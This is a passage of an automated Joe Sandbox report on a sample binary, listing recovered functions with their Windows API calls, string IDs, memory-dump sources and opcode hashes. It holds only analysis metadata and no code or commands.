                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                          • Instruction ID: 09477abdc93150647722cba2f2bb71758a97f2d3676be8414340c53e9f0f53f4
                                                          • Opcode Fuzzy Hash: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                          • Instruction Fuzzy Hash: 70115E75605704DFE3218F51DC48F92BBBCEB00B05F108569A616D6890E7B1E5499FA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: c652ac84ad067a4a66f08cb5b8fbda01b031fcf7b2a87d3ac497c63b4f4275e5
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 42014C7245914ABBCF175F84CC42CEE3F66BB18350F598415FE18581B1D236C9B1AB81
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 003EB2E4
                                                          • ScreenToClient.USER32(?,?), ref: 003EB2FC
                                                          • ScreenToClient.USER32(?,?), ref: 003EB320
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003EB33B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                          • Instruction ID: 76e46f260a7c56d6ab5b8888768e2feeabcfe4faba8b6803008ec09125475590
                                                          • Opcode Fuzzy Hash: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                          • Instruction Fuzzy Hash: A11143B9D00249EFDB51CFA9D8849EEFBB9FB08310F108166E914E3260D775AA558F50
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003C6BE6
                                                            • Part of subcall function 003C76C4: _memset.LIBCMT ref: 003C76F9
                                                          • _memmove.LIBCMT ref: 003C6C09
                                                          • _memset.LIBCMT ref: 003C6C16
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003C6C26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                          • Instruction ID: 5eb219b98a38f61203f4fcaa3fa06c0c142fc896cc23b4bae77101fb931482fb
                                                          • Opcode Fuzzy Hash: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                          • Instruction Fuzzy Hash: C3F05E3A200204ABCF026F55DC85E8ABF29EF45320F04C0A5FE089E267D771E911CBB4
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00362231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 0036223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00362250
                                                          • GetStockObject.GDI32(00000005), ref: 00362258
                                                          • GetWindowDC.USER32(?,00000000), ref: 0039BE83
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039BE90
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0039BEA9
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0039BEC2
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0039BEE2
                                                          • ReleaseDC.USER32(?,00000000), ref: 0039BEED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                          • Instruction ID: a3e97541c687a5ac1743140fc49feb3c6f4710e6a2fb765b24eb380c4af83279
                                                          • Opcode Fuzzy Hash: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                          • Instruction Fuzzy Hash: 11E03031504184AEEF225F64FC4D7D87B19EB15332F018366FA69480E187B14580DB11
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 003B871B
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8722
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B82E6), ref: 003B872F
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8736
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                          • Instruction ID: 5bc798ad9a2b688d7f1a1b3e5f02055bd6ba51b1dade7969f20c33904ee34579
                                                          • Opcode Fuzzy Hash: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                          • Instruction Fuzzy Hash: DCE086366122529FD7315FB0AD4DB963BACEF90795F158828B385CD0C0DA749841C750
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %?
                                                          • API String ID: 0-3131337030
                                                          • Opcode ID: e3efff8a41e68c85c22f2ea4edbd847ac7a4059dd9ebf4dfd97589398375ea9a
                                                          • Instruction ID: 2994db34890fd90290f9627f9541a729eed95920c4cdc959f6d197a80e213c01
                                                          • Opcode Fuzzy Hash: e3efff8a41e68c85c22f2ea4edbd847ac7a4059dd9ebf4dfd97589398375ea9a
                                                          • Instruction Fuzzy Hash: 89B1D4758001099BCF17EF94C8969FEBBB8FF44394F50C126E502AB299DB309E85CB95
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __itow_s
                                                          • String ID: xbB$xbB
                                                          • API String ID: 3653519197-2672806994
                                                          • Opcode ID: a5af788736a22d91272fd4b3fdf17015582d019cfdceb72af3609b36ad7d1437
                                                          • Instruction ID: b2f04057feac0911b7a626e9fc6a8de2837c46baaf81b539e4fbf16c7b32a171
                                                          • Opcode Fuzzy Hash: a5af788736a22d91272fd4b3fdf17015582d019cfdceb72af3609b36ad7d1437
                                                          • Instruction Fuzzy Hash: 69B17E72A00109EFCB16EF54D891EBABBB9FF59300F15805AF9459B392EB70D941CB60
                                                          APIs
                                                            • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • __wcsnicmp.LIBCMT ref: 003CB02D
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003CB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: ce4178681eb67d346a32725ad56db766e398a21def2ed6f8ab38170d0f49b3a1
                                                          • Instruction ID: a00c297c6c6ae947560fa3bfd7f22bddc72ee220f267f322fb0ab24ac40410b8
                                                          • Opcode Fuzzy Hash: ce4178681eb67d346a32725ad56db766e398a21def2ed6f8ab38170d0f49b3a1
                                                          • Instruction Fuzzy Hash: 69615D75A00215EFCB16DF94C892FAEB7B8EB08310F15806EF956EB291D770AE44CB50
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00372968
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00372981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                          • Instruction ID: 1d6bd6415ed87fbd3e4f474e0c90000a95211274b922992a7c70f5d03d3fc920
                                                          • Opcode Fuzzy Hash: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                          • Instruction Fuzzy Hash: B05155B24087449BD321EF20D886BABBBECFF89344F41895DF2D8450A5DF318528CB66
                                                          APIs
                                                            • Part of subcall function 00364F0B: __fread_nolock.LIBCMT ref: 00364F29
                                                          • _wcscmp.LIBCMT ref: 003C9824
                                                          • _wcscmp.LIBCMT ref: 003C9837
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                          • Instruction ID: 59a6b92258ae428b4c784bb7334ded044bfd754d193912f40322a78becad1da2
                                                          • Opcode Fuzzy Hash: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                          • Instruction Fuzzy Hash: 3841DB71A00309BADF229BA5CC49FEFB7BDDF85710F01446AF904EB185D6719E048B65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID: DdB$DdB
                                                          • API String ID: 1473721057-1576950555
                                                          • Opcode ID: c8c598f0a38f1d1b03bab06910fedb050de12bd653f2aaf911dce94ff046895b
                                                          • Instruction ID: a6ed08982816c587d95862d6a9aae34e970d59d9420a0b56d7361569a88c7fd8
                                                          • Opcode Fuzzy Hash: c8c598f0a38f1d1b03bab06910fedb050de12bd653f2aaf911dce94ff046895b
                                                          • Instruction Fuzzy Hash: 855121786087418FD766DF18C480A1ABBF1FB99344F96885DE8859B324D332EC81CF96
                                                          APIs
                                                          • _memset.LIBCMT ref: 003D259E
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003D25D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                          • Instruction ID: b1748c5b32ac76d98da0baee56c20ff033ef56caa4f8a864591abf7a9b9cb9a5
                                                          • Opcode Fuzzy Hash: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                          • Instruction Fuzzy Hash: D6311A71800219ABCF02EFA1DC85EEEBFB8FF18314F10405AF955AA265DB319955DB60
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 003E7B61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7B76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                          • Instruction ID: 3f1531183d23ce4646805f9d8b0c41561ff64eb5b8e59e12b986c930f54972d3
                                                          • Opcode Fuzzy Hash: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                          • Instruction Fuzzy Hash: 83411B74A0525A9FDB15CF65D881BEABBB9FF08300F11427AE904EB391E770A951CF90
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 003E6B17
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E6B53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                          • Instruction ID: 01479ae36c9f9fcf19e3f9e3e4a25e80024d40c7046e78f7039f076d22b173a4
                                                          • Opcode Fuzzy Hash: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                          • Instruction Fuzzy Hash: B731CF71200254AEDB129F26CC81BFB73ADFF987A0F108629F9A5D7190DB70AC81C760
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C2911
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C294C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 64b90eaa48197bf24147445851be88923091ec9eca332baefd7d84fa2bdb622f
                                                          • Instruction ID: 46539e966b7e1c037ac61daeb3da4c902b627d2da75ef221561618e818a33c9e
                                                          • Opcode Fuzzy Hash: 64b90eaa48197bf24147445851be88923091ec9eca332baefd7d84fa2bdb622f
                                                          • Instruction Fuzzy Hash: CA31BD31A00305EBEB2ADF58C885FAFBBB8EF45350F16002DE985EA1A0D7B09D54CB51
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E6761
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E676C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                          • Instruction ID: 3d494aa78a2674d19ffdd01a0637290a09798585e67521f29ab1a338f6427b7a
                                                          • Opcode Fuzzy Hash: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                          • Instruction Fuzzy Hash: C711B6713002586FEF228F55CC81EFB376AEB543A8F114225F9149B2D0D671DC5187A0
                                                          APIs
                                                            • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                            • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                            • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                          • GetWindowRect.USER32(00000000,?), ref: 003E6C71
                                                          • GetSysColor.USER32(00000012), ref: 003E6C8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                          • Instruction ID: 2d249cebef2edb121c710c6bec0d1649db31afefdb3d89928a6e4654918e78b9
                                                          • Opcode Fuzzy Hash: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                          • Instruction Fuzzy Hash: 7E218972610259AFDF05DFA9CC46AFA7BB8FB08304F104628F995D2280E730E850DB60
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 003E69A2
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E69B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
